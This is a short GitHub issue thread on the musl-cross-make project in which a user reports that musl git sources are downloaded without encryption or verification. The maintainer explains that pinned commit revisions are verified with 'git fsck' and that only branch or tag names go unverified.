musl git sources are not verified

richfelker / musl-cross-make

Simple makefile-based build for musl cross compiler

MIT License

1.29k stars 266 forks source link

musl git sources are not verified #28

Open ollieparanoid opened 7 years ago

ollieparanoid commented 7 years ago

Hi there,

when downloading musl via git (which is the default), the sources get downloaded over a plain git connection without any encryption or verification.

Please switch to downloading tarballs only (where the hashes do get checked) and disable the insecure git retrieval until a HTTPS git mirror can be used.

Maybe someone can talk to the musl developers and ask for a HTTPS git mirror.

Thank you.

richfelker commented 7 years ago

While in light of sha1 being broken it's not strong against an adversary with heavy resources, use of a specific git revision (MUSL_VER = git-$sha1) is verified by "git fsck" which the top-level Makefile performs. It's only if you use (and thereby trust) a branch name or tag that it's unverified. Maybe this should be documented better.

ollieparanoid commented 7 years ago

You are right, I did not notice the git fsck call and the implicit checkout of a specific branch - thank you for explaining.